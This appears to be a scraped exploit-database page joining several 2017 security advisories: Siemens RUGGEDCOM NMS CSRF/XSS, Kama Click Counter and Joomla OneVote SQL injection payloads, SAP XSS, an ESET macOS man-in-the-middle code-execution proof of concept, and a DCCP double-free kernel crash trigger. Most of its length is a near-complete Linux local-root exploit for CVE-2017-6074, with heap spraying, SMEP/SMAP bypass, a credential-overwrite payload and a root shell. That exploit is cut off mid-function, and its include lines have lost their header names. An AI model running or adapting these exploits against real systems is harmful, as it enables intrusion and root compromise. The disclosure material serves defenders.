Siemens RUGGEDCOM NMS

CVSS v3 8.8

ATTENTION: Remotely exploitable/low skill level to exploit.

Vendor: Siemens

Equipment: RUGGEDCOM NMS

Vulnerabilities: Cross-Site Request Forgery, Cross-Site Scripting.

AFFECTED PRODUCTS

Siemens reports that the vulnerability affects the following RUGGEDCOM monitoring products:

  • RUGGEDCOM NMS: All versions prior to V2.1.0 (Windows and Linux).

IMPACT

Successful exploitation of these vulnerabilities could allow a remote attacker to perform administrative operations under certain conditions.

MITIGATION

Siemens provides RUGGEDCOM NMS V2.1.0 which fixes the vulnerabilities and recommends users update to the new version. Information on how to obtain the latest RUGGEDCOM software and firmware can be found at the following location on the Siemens web site:

https://support.industry.siemens.com/cs/ww/en/view/109745179

For more information on this vulnerability and more detailed mitigation instructions, please see Siemens Security Advisory SSA-363881 at the following location:

http://www.siemens.com/cert/en/cert-security-advisories.htm

As a general security measure Siemens strongly recommends protecting network access to the RUGGEDCOM NMS with appropriate mechanisms and configuring the environment according to Siemens’ operational guidelines in order to run the devices in a protected IT environment.

https://www.siemens.com/cert/operational-guidelines-industrial-security

NCCIC/ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

ICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available in the ICS‑CERT Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.

No known public exploits specifically target these vulnerabilities. These vulnerabilities are not remotely exploitable.

VULNERABILITY OVERVIEW

The web application (Ports 8080/TCP and 8081/TCP) could allow a remote attacker to perform a cross-site request forgery (CSRF) attack, potentially allowing an attacker to execute administrative operations, provided the targeted user has an active session and is induced to trigger a malicious request.

CVE-2017-2682 has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).

A non-privileged user of the web application (Ports 8080/TCP and 8081/TCP) could perform a persistent cross-site scripting (XSS) attack, potentially resulting in acquisition of administrative permissions.

CVE-2017-2683 has been assigned to this vulnerability. A CVSS v3 base score of 6.3 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N).

BACKGROUND

Critical Infrastructure Sectors: Energy, Healthcare and Public Health, and Transportation Systems

Countries/Areas Deployed: Worldwide

Company Headquarters Location: Germany

WordPress Kama Click Counter 3.4.9 SQL Injection

=============================================
MGC ALERT 2017-002
– Original release date: February 21, 2017
– Last revised: February 28, 2017
– Discovered by: Manuel GarcAa CA!rdenas
– Severity: 7,1/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
————————-
WordPress Plugin Kama Click Counter 3.4.9 – Blind SQL Injection

II. BACKGROUND
————————-
Using this plugin you will have statistics on clicks on your files or any
other link (not file).

III. DESCRIPTION
————————-
This bug was found using the portal in the
/wp-content/plugins/kama-clic-counter/admin.php file.

In the line 172,173 do not sanitize the input values.

$order_by = ($x= & $_GET[‘order_by’]) ? esc_sql($x) : ‘link_date’;
$order = ($x= & $_GET[‘order’]) ? esc_sql($x) : ‘DESC’;

And in the line 182 or 186 the sql sentence is executed:

$sql = “SELECT * FROM $wpdb->kcc_clicks WHERE link_url LIKE ‘%$s%’ OR
link_name LIKE ‘%$s%’ ORDER BY $order_by $order LIMIT $offset, $limit”;
$sql = “SELECT * FROM $wpdb->kcc_clicks ORDER BY $order_by $order LIMIT
$offset, $limit”;

To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

It is possible to inject SQL code.

IV. PROOF OF CONCEPT
————————-
The following URL have been confirmed to all suffer from Time Based SQL
Injection.

Time Based SQL Injection POC:

/wordpress/wp-admin/admin.php?page=kama-clic-counter&order_by=link_name&order=ASC%2c(select*from(select(sleep(2)))a)&paged=1
(2 seconds of response)

/wordpress/wp-admin/admin.php?page=kama-clic-counter&order_by=link_name&order=ASC%2c(select*from(select(sleep(30)))a)&paged=1
(30 seconds of response)

V. BUSINESS IMPACT
————————-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
————————-
Kama Click Counter <= 3.4.9

VII. SOLUTION
————————-
Disable the plugin until a fix is available.

VIII. REFERENCES
————————-
https://wordpress.org/plugins-wp/kama-clic-counter/

IX. CREDITS
————————-
This vulnerability has been discovered and reported
by Manuel GarcAa CA!rdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
————————-
February 21, 2017 1: Initial release
February 28, 2017 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
————————-
February 21, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
February 21, 2017 2: Send to vendor
February 24, 2017 3: New contact with vendor without response
February 28, 2017 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
————————-
The information contained within this advisory is supplied “as-is” with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
————————-
Manuel Garcia Cardenas
Pentester

SAP BusinessObjects Financial Consolidation 10.0.0.1933 Cross Site Scripting

[Description]
Cross-site scripting (XSS) vulnerability in the help component of SAP
BusinessObjects Financial Consolidation 10.0.0.1933 allows remote
attackers to inject arbitrary web script or HTML via a GET request.

——————————————

[Additional Information]
The help pages of SAP BusinessObjects Financial Consolidation is
vulnerable to a reflected cross-site scripting (XSS) attack. The help
pages are build out of multiple iframes. The frameset.htm can be
requested with JavaScript code as part of the parameters. The
parameters are written using JavaScript into the “src” attribute of an
“iframe” tag. The JavaScript code reads the URL that is present in the
browser and does basic filtering based on regular expressions to
verify whether a URI is included in the argument. However this filter
can be bypassed.

——————————————

[Vulnerability Type]
Cross Site Scripting (XSS)

——————————————

[Vendor of Product]
SAP

——————————————

[Affected Product Code Base]
SAP BusinessObjects Financial Consolidation – 10.0.0.1933

——————————————

[Affected Component]
Help component (/finance/help/en/frameset.htm)

——————————————

[Attack Type]
Remote

——————————————

[Attack Vectors]
An attacker could trick a user into clicking on the malicious link
redirecting the user to the trusted web application. However the
attacker can include malicious JavaScript code that for example loads
external content serving malware. The attacker could also create a web
application that is loaded as an iFrame to trick the victim into
entering his personal information or credentials to SAP BFC.

——————————————

[Reference & Solution]
Credits: https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=448476554
SAP Security Patch Day 11 / 2016: https://launchpad.support.sap.com/#/notes/2386447
SAP Security note: https://launchpad.support.sap.com/#/notes/2368106

——————————————

[Has vendor confirmed or acknowledged the vulnerability?]
true

——————————————

[Discoverer]
Deloitte, Sander Maas & Dima van de Wouw

——————————————

[Reserved CVE]
CVE-2017-6061

Kind regards,
Deloitte Zero Day
*Disclaimer:*

________________________________
This e-mail message and its attachments are subject to the disclaimer published at the following website of Deloitte:
http://www2.deloitte.com/nl/nl/legal/Disclaimer.html

Deloitte refers to one or more of Deloitte Touche Tohmatsu Limited, a UK private company limited by guarantee (“DTTL”), its network of member firms, and their related entities. DTTL and each of its member firms are legally separate and independent entities. DTTL (also referred to as “Deloitte Global”) does not provide services to clients. Please see http://www2.deloitte.com/nl/nl/pages/about-deloitte/articles/over-deloitte.html for a more detailed description of DTTL and its member firms.

ESET Endpoint Antivirus 6 Remote Code Execution

CVE-2016-9892 – Remote Code Execution as Root via ESET Endpoint Antivirus 6
—————————————————————————

Summary
=======
Name: Remote Code Execution as Root via ESET Endpoint Antivirus 6
CVE: CVE-2016-9892
Discoverers: Jason Geffner and Jan Bee
Vendor: ESET
Product: ESET Endpoint Antivirus 6 for macOS
Risk: Critical
Discovery Date: 2016-11-03
Publication Data: 2017-02-27
Fixed Version: 6.4.168.0

Introduction
============
Per ESET’s online material, “ESET Endpoint Antivirus for OS X delivers award-
winning cross-platform protection for multi-platform environments. It protects
against malware and spyware and shields end users from fake websites phishing
for sensitive information such as usernames, passwords or credit card details.
Unauthorized devices can be blocked from the system entirely. The solution’s
highly intuitive interface allows for quick navigation.”

Vulnerable versions of ESET Endpoint Antivirus 6 are statically linked with an
outdated XML parsing library and do not perform proper server authentication,
allowing for remote unauthenticated attackers to perform arbitrary code
execution as root on vulnerable clients.

Vulnerability
=============
The esets_daemon service, which runs as root, is statically linked with an
outdated version of the POCO XML parser library (https://pocoproject.org/) —
version 1.4.6p1 from 2013-03-06. This version of POCO is based on Expat
(http://expat.sourceforge.net/) version 2.0.1 from 2007-06-05, which has a
publicly known XML parsing vulnerability (CVE-2016-0718) that allows for
arbitrary code execution via malformed XML content.

When ESET Endpoint Antivirus tries to activate its license, esets_daemon sends a
request to https://edf.eset.com/edf. The esets_daemon service does not validate
the web server’s certificate, so a man-in-the-middle can intercept the request
and respond using a self-signed HTTPS certificate. The esets_daemon service
parses the response as an XML document, thereby allowing the attacker to supply
malformed content and exploit CVE-2016-0718 to achieve arbitrary code execution
as root.

Proof of Concept
================
Extract overflow.xml from https://bugzilla.suse.com/attachment.cgi?id=676490
(ZIP file containing a public proof-of-concept for CVE-2016-0718) and run the
following Python program:
________________________________________________________________________________
import BaseHTTPServer, SimpleHTTPServer, ssl, subprocess

class XmlHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_POST(self):
with open(“overflow.xml”) as f:
xml = f.read()
self.send_response(200)
self.send_header(“Content-Type”, “text/xml”)
self.send_header(“Content-Length”, len(xml))
self.end_headers()
self.wfile.write(xml)

def do_CONNECT(self):
self.wfile.write(“HTTP/1.1 200 Connection Established\r\n”)
self.end_headers()
self.connection = ssl.wrap_socket(
self.connection, certfile=”/tmp/xml.crt”,
keyfile=”/tmp/xml.key”, server_side=True)
self.rfile = self.connection.makefile(“rb”, self.rbufsize)
self.wfile = self.connection.makefile(“wb”, self.wbufsize)
self.close_connection = 0

subprocess.call(“openssl req -newkey rsa:2048 -x509 -nodes -subj ” +
“/CN=edf.eset.com -out /tmp/xml.crt -keyout /tmp/xml.key”,
shell=True)

BaseHTTPServer.HTTPServer((“localhost”, 4443), XmlHandler).serve_forever()
________________________________________________________________________________

Next, open the ESET Endpoint Antivirus UI, choose “Setup –> Enter application
preferences…”, and enable a local proxy server for localhost:4443 (this proxy
configuration is used to simulate a man-in-the-middle attack; a real-world
attack would not require a victim to enable a proxy server).

Next, in the ESET Endpoint Antivirus UI, choose “Help –> Activate Product”,
enter any License Key value you like (such as 0000-0000-0000-0000-0000), and
press “Activate”.

The esets_daemon process will immediately crash (the public PoC overflow.xml
file used above just demonstrates that the vulnerability exists; it does not
perform actual code execution). You can confirm this by running
/Applications/Utilities/Console.app/Contents/MacOS/Console and seeing that
esets_daemon crashed.

Mitigation
==========
ESET patched this vulnerability in ESET Endpoint Antivirus version 6.4.168.0.

>From the product’s change log on
https://www.eset.com/us/business/endpoint-security/mac-antivirus/:

Version 6.4.168.0
– Added: Product verifies ESET SSL certificate on all supported OS X/macOS
– Added: Upgraded POCO parsing library to the latest build

Discoverers
===========
This vulnerability was discovered and reported to ESET by Jason Geffner and Jan
Bee of the Google Security Team.

Timeline
========
2016-11-03 – Vulnerability discovered
2016-11-03 – Vulnerability reported to ESET Security Team
2016-11-10 – Phone call between Google and ESET to discuss vulnerability
2016-02-08 – ESET provided Google with updated build
2016-02-21 – Google confirmed vulnerability remediated
2016-02-21 – ESET publicly released version 6.4.168.0
2016-02-27 – Public disclosure

Linux Kernel 4.4.0 Ubuntu DCCP Double-Free Crash

// A trigger for CVE-2017-6074, crashes kernel.
// Tested on 4.4.0-62-generic #83-Ubuntu kernel.
// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074
//
// Andrey Konovalov

#define _GNU_SOURCE

#include

#include
#include
#include
#include
#include
#include

#include
#include
#include
#include
#include
#include
#include
#include

#include

int main() {
struct sockaddr_in6 sa1;
sa1.sin6_family = AF_INET6;
sa1.sin6_port = htons(20002);
inet_pton(AF_INET6, “::1”, &sa1.sin6_addr);
sa1.sin6_flowinfo = 0;
sa1.sin6_scope_id = 0;

int optval = 8;

int s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
bind(s1, &sa1, 0x20);
listen(s1, 0x9);

setsockopt(s1, IPPROTO_IPV6, IPV6_RECVPKTINFO, &optval, 4);

int s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
connect(s2, &sa1, 0x20);

shutdown(s1, SHUT_RDWR);
close(s1);
shutdown(s2, SHUT_RDWR);
close(s2);

return 0;
}

Joomla OneVote! 1.0 SQL Injection

# # # # # 
# Exploit Title: Joomla! Component OneVote! v1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_onevote
# Date: 27.02.2017
# Vendor Homepage: http://advcomsys.com/
# Software: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/onevote/
# Demo: http://advcomsys.com/index.php/joomla-demos/elections
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/components/com_onevote/results.php?election_id=[SQL]
# +/*!50000union*/[email protected]@version-- -
# # # # #

Linux Kernel 4.4.0 Ubuntu DCCP Double-Free Privilege Escalation

// A proof-of-concept local root exploit for CVE-2017-6074.
// Includes a semireliable SMAP/SMEP bypass.
// Tested on 4.4.0-62-generic #83-Ubuntu kernel.
// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074
//
// Usage:
// $ gcc poc.c -o pwn
// $ ./pwn
// [.] namespace sandbox setup successfully
// [.] disabling SMEP & SMAP
// [.] scheduling 0xffffffff81064550(0x406e0)
// [.] waiting for the timer to execute
// [.] done
// [.] SMEP & SMAP should be off now
// [.] getting root
// [.] executing 0x402043
// [.] done
// [.] should be root now
// [.] checking if we got root
// [+] got r00t ^_^
// [!] don’t kill the exploit binary, the kernel will crash
// # cat /etc/shadow
// …
// daemon:*:17149:0:99999:7:::
// bin:*:17149:0:99999:7:::
// sys:*:17149:0:99999:7:::
// sync:*:17149:0:99999:7:::
// games:*:17149:0:99999:7:::
// …
//
// Andrey Konovalov

#define _GNU_SOURCE

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#include

#include
#include
#include
#include

#include
#include #include

#define SMEP_SMAP_BYPASS 1

// Needed for local root.
#define COMMIT_CREDS 0xffffffff810a2840L
#define PREPARE_KERNEL_CRED 0xffffffff810a2c30L
#define SHINFO_OFFSET 1728

// Needed for SMEP_SMAP_BYPASS.
#define NATIVE_WRITE_CR4 0xffffffff81064550ul
#define CR4_DESIRED_VALUE 0x406e0ul
#define TIMER_OFFSET (728 + 48 + 104)

#define KMALLOC_PAD 128
#define KMALLOC_WARM 32
#define CATCH_FIRST 6
#define CATCH_AGAIN 16
#define CATCH_AGAIN_SMALL 64

// Port is incremented on each use.
static int port = 11000;

void debug(const char *msg) {
/*
char buffer[32];
snprintf(&buffer[0], sizeof(buffer), “echo ‘%s’ > /dev/kmsg\n”, msg);
system(buffer);
*/
}

// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *

struct ubuf_info {
uint64_t callback; // void (*callback)(struct ubuf_info *, bool)
uint64_t ctx; // void *
uint64_t desc; // unsigned long
};

struct skb_shared_info {
uint8_t nr_frags; // unsigned char
uint8_t tx_flags; // __u8
uint16_t gso_size; // unsigned short
uint16_t gso_segs; // unsigned short
uint16_t gso_type; // unsigned short
uint64_t frag_list; // struct sk_buff *
uint64_t hwtstamps; // struct skb_shared_hwtstamps
uint32_t tskey; // u32
uint32_t ip6_frag_id; // __be32
uint32_t dataref; // atomic_t
uint64_t destructor_arg; // void *
uint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS];
};

struct ubuf_info ui;

void init_skb_buffer(char* buffer, void *func) {
memset(&buffer[0], 0, 2048);

struct skb_shared_info *ssi = (struct skb_shared_info *)&buffer[SHINFO_OFFSET];

ssi->tx_flags = 0xff;
ssi->destructor_arg = (uint64_t)&ui;
ssi->nr_frags = 0;
ssi->frag_list = 0;

ui.callback = (unsigned long)func;
}

struct timer_list {
void *next;
void *prev;
unsigned long expires;
void (*function)(unsigned long);
unsigned long data;
unsigned int flags;
int slack;
};

void init_timer_buffer(char* buffer, void *func, unsigned long arg) {
memset(&buffer[0], 0, 2048);

struct timer_list* timer = (struct timer_list *)&buffer[TIMER_OFFSET];

timer->next = 0;
timer->prev = 0;
timer->expires = 4294943360;
timer->function = func;
timer->data = arg;
timer->flags = 1;
timer->slack = -1;
}

// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *

struct dccp_handle {
struct sockaddr_in6 sa;
int s1;
int s2;
};

void dccp_init(struct dccp_handle *handle, int port) {
handle->sa.sin6_family = AF_INET6;
handle->sa.sin6_port = htons(port);
inet_pton(AF_INET6, “::1”, &handle->sa.sin6_addr);
handle->sa.sin6_flowinfo = 0;
handle->sa.sin6_scope_id = 0;

handle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
if (handle->s1 == -1) {
perror(“socket(SOCK_DCCP)”);
exit(EXIT_FAILURE);
}

int rv = bind(handle->s1, &handle->sa, sizeof(handle->sa));
if (rv != 0) {
perror(“bind()”);
exit(EXIT_FAILURE);
}

rv = listen(handle->s1, 0x9);
if (rv != 0) {
perror(“listen()”);
exit(EXIT_FAILURE);
}

int optval = 8;
rv = setsockopt(handle->s1, IPPROTO_IPV6, IPV6_RECVPKTINFO,
&optval, sizeof(optval));
if (rv != 0) {
perror(“setsockopt(IPV6_RECVPKTINFO)”);
exit(EXIT_FAILURE);
}

handle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
if (handle->s1 == -1) {
perror(“socket(SOCK_DCCP)”);
exit(EXIT_FAILURE);
}
}

void dccp_kmalloc_kfree(struct dccp_handle *handle) {
int rv = connect(handle->s2, &handle->sa, sizeof(handle->sa));
if (rv != 0) {
perror(“connect(SOCK_DCCP)”);
exit(EXIT_FAILURE);
}
}

void dccp_kfree_again(struct dccp_handle *handle) {
int rv = shutdown(handle->s1, SHUT_RDWR);
if (rv != 0) {
perror(“shutdown(SOCK_DCCP)”);
exit(EXIT_FAILURE);
}
}

void dccp_destroy(struct dccp_handle *handle) {
close(handle->s1);
close(handle->s2);
}

// * * * * * * * * * * * * * * Heap spraying * * * * * * * * * * * * * * * * *

struct udp_fifo_handle {
int fds[2];
};

void udp_fifo_init(struct udp_fifo_handle* handle) {
int rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, handle->fds);
if (rv != 0) {
perror(“socketpair()”);
exit(EXIT_FAILURE);
}
}

void udp_fifo_destroy(struct udp_fifo_handle* handle) {
close(handle->fds[0]);
close(handle->fds[1]);
}

void udp_fifo_kmalloc(struct udp_fifo_handle* handle, char *buffer) {
int rv = send(handle->fds[0], buffer, 1536, 0);
if (rv != 1536) {
perror(“send()”);
exit(EXIT_FAILURE);
}
}

void udp_fifo_kmalloc_small(struct udp_fifo_handle* handle) {
char buffer[128];
int rv = send(handle->fds[0], &buffer[0], 128, 0);
if (rv != 128) {
perror(“send()”);
exit(EXIT_FAILURE);
}
}

void udp_fifo_kfree(struct udp_fifo_handle* handle) {
char buffer[2048];
int rv = recv(handle->fds[1], &buffer[0], 1536, 0);
if (rv != 1536) {
perror(“recv()”);
exit(EXIT_FAILURE);
}
}

int timer_kmalloc() {
int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
if (s == -1) {
perror(“socket(SOCK_DGRAM)”);
exit(EXIT_FAILURE);
}
return s;
}

#define CONF_RING_FRAMES 1
void timer_schedule(int handle, int timeout) {
int optval = TPACKET_V3;
int rv = setsockopt(handle, SOL_PACKET, PACKET_VERSION,
&optval, sizeof(optval));
if (rv != 0) {
perror(“setsockopt(PACKET_VERSION)”);
exit(EXIT_FAILURE);
}
struct tpacket_req3 tp;
memset(&tp, 0, sizeof(tp));
tp.tp_block_size = CONF_RING_FRAMES * getpagesize();
tp.tp_block_nr = 1;
tp.tp_frame_size = getpagesize();
tp.tp_frame_nr = CONF_RING_FRAMES;
tp.tp_retire_blk_tov = timeout;
rv = setsockopt(handle, SOL_PACKET, PACKET_RX_RING,
(void *)&tp, sizeof(tp));
if (rv != 0) {
perror(“setsockopt(PACKET_RX_RING)”);
exit(EXIT_FAILURE);
}
}

void socket_sendmmsg(int sock, char *buffer) {
struct mmsghdr msg[1];

msg[0].msg_hdr.msg_iovlen = 0;

// Buffer to kmalloc.
msg[0].msg_hdr.msg_control = &buffer[0];
msg[0].msg_hdr.msg_controllen = 2048;

// Make sendmmsg exit easy with EINVAL.
msg[0].msg_hdr.msg_name = “root”;
msg[0].msg_hdr.msg_namelen = 1;

int rv = syscall(__NR_sendmmsg, sock, msg, 1, 0);
if (rv == -1 && errno != EINVAL) {
perror(“[-] sendmmsg()”);
exit(EXIT_FAILURE);
}
}

void sendmmsg_kmalloc_kfree(int port, char *buffer) {
int sock[2];

int rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, sock);
if (rv != 0) {
perror(“socketpair()”);
exit(EXIT_FAILURE);
}

socket_sendmmsg(sock[0], buffer);

close(sock[0]);
}

// * * * * * * * * * * * * * * Heap warming * * * * * * * * * * * * * * * * *

void dccp_connect_pad(struct dccp_handle *handle, int port) {
handle->sa.sin6_family = AF_INET6;
handle->sa.sin6_port = htons(port);
inet_pton(AF_INET6, “::1”, &handle->sa.sin6_addr);
handle->sa.sin6_flowinfo = 0;
handle->sa.sin6_scope_id = 0;

handle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
if (handle->s1 == -1) {
perror(“socket(SOCK_DCCP)”);
exit(EXIT_FAILURE);
}

int rv = bind(handle->s1, &handle->sa, sizeof(handle->sa));
if (rv != 0) {
perror(“bind()”);
exit(EXIT_FAILURE);
}

rv = listen(handle->s1, 0x9);
if (rv != 0) {
perror(“listen()”);
exit(EXIT_FAILURE);
}

handle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
if (handle->s1 == -1) {
perror(“socket(SOCK_DCCP)”);
exit(EXIT_FAILURE);
}

rv = connect(handle->s2, &handle->sa, sizeof(handle->sa));
if (rv != 0) {
perror(“connect(SOCK_DCCP)”);
exit(EXIT_FAILURE);
}
}

void dccp_kmalloc_pad() {
int i;
struct dccp_handle handle;
for (i = 0; i < 4; i++) {
dccp_connect_pad(&handle, port++);
}
}

void timer_kmalloc_pad() {
int i;
for (i = 0; i < 4; i++) {
socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
}
}

void udp_kmalloc_pad() {
int i, j;
char dummy[2048];
struct udp_fifo_handle uh[16];
for (i = 0; i < KMALLOC_PAD / 16; i++) {
udp_fifo_init(&uh[i]);
for (j = 0; j < 16; j++)
udp_fifo_kmalloc(&uh[i], &dummy[0]);
}
}

void kmalloc_pad() {
debug(“dccp kmalloc pad”);
dccp_kmalloc_pad();
debug(“timer kmalloc pad”);
timer_kmalloc_pad();
debug(“udp kmalloc pad”);
udp_kmalloc_pad();
}

void udp_kmalloc_warm() {
int i, j;
char dummy[2048];
struct udp_fifo_handle uh[16];
for (i = 0; i < KMALLOC_WARM / 16; i++) {
udp_fifo_init(&uh[i]);
for (j = 0; j < 16; j++)
udp_fifo_kmalloc(&uh[i], &dummy[0]);
}
for (i = 0; i < KMALLOC_WARM / 16; i++) {
for (j = 0; j < 16; j++)
udp_fifo_kfree(&uh[i]);
}
}

void kmalloc_warm() {
udp_kmalloc_warm();
}

// * * * * * * * * * * * * * Disabling SMEP/SMAP * * * * * * * * * * * * * * *

// Executes func(arg) from interrupt context multiple times.
void kernel_exec_irq(void *func, unsigned long arg) {
int i;
struct dccp_handle dh;
struct udp_fifo_handle uh1, uh2, uh3, uh4;
char dummy[2048];
char buffer[2048];

printf(“[.] scheduling %p(%p)\n”, func, (void *)arg);

memset(&dummy[0], 0xc3, 2048);
init_timer_buffer(&buffer[0], func, arg);

udp_fifo_init(&uh1);
udp_fifo_init(&uh2);
udp_fifo_init(&uh3);
udp_fifo_init(&uh4);

debug(“kmalloc pad”);
kmalloc_pad();

debug(“kmalloc warm”);
kmalloc_warm();

debug(“dccp init”);
dccp_init(&dh, port++);

debug(“dccp kmalloc kfree”);
dccp_kmalloc_kfree(&dh);

debug(“catch 1”);
for (i = 0; i < CATCH_FIRST; i++)
udp_fifo_kmalloc(&uh1, &dummy[0]);

debug(“dccp kfree again”);
dccp_kfree_again(&dh);

debug(“catch 2”);
for (i = 0; i < CATCH_FIRST; i++)
udp_fifo_kmalloc(&uh2, &dummy[0]);

int timers[CATCH_FIRST];
debug(“catch 1 -> timer”);
for (i = 0; i < CATCH_FIRST; i++) {
udp_fifo_kfree(&uh1);
timers[i] = timer_kmalloc();
}

debug(“catch 1 small”);
for (i = 0; i < CATCH_AGAIN_SMALL; i++)
udp_fifo_kmalloc_small(&uh4);

debug(“schedule timers”);
for (i = 0; i < CATCH_FIRST; i++)
timer_schedule(timers[i], 500);

debug(“catch 2 -> overwrite timers”);
for (i = 0; i < CATCH_FIRST; i++) {
udp_fifo_kfree(&uh2);
udp_fifo_kmalloc(&uh3, &buffer[0]);
}

debug(“catch 2 small”);
for (i = 0; i < CATCH_AGAIN_SMALL; i++)
udp_fifo_kmalloc_small(&uh4);

printf(“[.] waiting for the timer to execute\n”);

debug(“wait”);
sleep(1);

printf(“[.] done\n”);
}

void disable_smep_smap() {
printf(“[.] disabling SMEP & SMAP\n”);
kernel_exec_irq((void *)NATIVE_WRITE_CR4, CR4_DESIRED_VALUE);
printf(“[.] SMEP & SMAP should be off now\n”);
}

// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * * *

// Executes func() from process context.
void kernel_exec(void *func) {
int i;
struct dccp_handle dh;
struct udp_fifo_handle uh1, uh2, uh3;
char dummy[2048];
char buffer[2048];

printf(“[.] executing %p\n”, func);

memset(&dummy[0], 0, 2048);
init_skb_buffer(&buffer[0], func);

udp_fifo_init(&uh1);
udp_fifo_init(&uh2);
udp_fifo_init(&uh3);

debug(“kmalloc pad”);
kmalloc_pad();

debug(“kmalloc warm”);
kmalloc_warm();

debug(“dccp init”);
dccp_init(&dh, port++);

debug(“dccp kmalloc kfree”);
dccp_kmalloc_kfree(&dh);

debug(“catch 1”);
for (i = 0; i < CATCH_FIRST; i++)
udp_fifo_kmalloc(&uh1, &dummy[0]);

debug(“dccp kfree again:”);
dccp_kfree_again(&dh);

debug(“catch 2”);
for (i = 0; i < CATCH_FIRST; i++)
udp_fifo_kmalloc(&uh2, &dummy[0]);

debug(“catch 1 -> overwrite”);
for (i = 0; i < CATCH_FIRST; i++) {
udp_fifo_kfree(&uh1);
sendmmsg_kmalloc_kfree(port++, &buffer[0]);
}
debug(“catch 2 -> free & trigger”);
for (i = 0; i < CATCH_FIRST; i++)
udp_fifo_kfree(&uh2);

debug(“catch 1 & 2”);
for (i = 0; i < CATCH_AGAIN; i++)
udp_fifo_kmalloc(&uh3, &dummy[0]);

printf(“[.] done\n”);
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;

void get_root_payload(void) {
commit_creds(prepare_kernel_cred(0));
}

void get_root() {
printf(“[.] getting root\n”);
kernel_exec(&get_root_payload);
printf(“[.] should be root now\n”);
}

// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *

void exec_shell() {
char *shell = “/bin/bash”;
char *args[] = {shell, “-i”, NULL};
execve(shell, args, NULL);
}

void fork_shell() {
pid_t rv;

rv = fork();
if (rv == -1) {
perror(“fork()”);
exit(EXIT_FAILURE);
}

if (rv == 0) {
exec_shell();
}
}

bool is_root() {
// We can’t simple check uid, since we’re running inside a namespace
// with uid set to 0. Try opening /etc/shadow instead.
int fd = open(“/etc/shadow”, O_RDONLY);
if (fd == -1)
return false;
close(fd);
return true;
}

void check_root() {
printf(“[.] checking if we got root\n”);

if (!is_root()) {
printf(“[-] something went wrong =(\n”);
printf(“[!] don’t kill the exploit binary, the kernel will crash\n”);
return;
}

printf(“[+] got r00t ^_^\n”);
printf(“[!] don’t kill the exploit binary, the kernel will crash\n”);

// Fork and exec instead of just doing the exec to avoid freeing
// skbuffs and prevent crashes due to a allocator corruption.
fork_shell();
}

static bool write_file(const char* file, const char* what, …)
{
char buf[1024];
va_list args;
va_start(args, what);
vsnprintf(buf, sizeof(buf), what, args);
va_end(args);
buf[sizeof(buf) – 1] = 0;
int len = strlen(buf);

int fd = open(file, O_WRONLY | O_CLOEXEC);
if (fd == -1)
return false;
if (write(fd, buf, len) != len) {
close(fd);
return false;
}
close(fd);
return true;
}

void setup_sandbox() {
int real_uid = getuid();
int real_gid = getgid();

if (unshare(CLONE_NEWUSER) != 0) {
perror(“unshare(CLONE_NEWUSER)”);
exit(EXIT_FAILURE);
}

if (unshare(CLONE_NEWNET) != 0) {
perror(“unshare(CLONE_NEWUSER)”);
exit(EXIT_FAILURE);
}

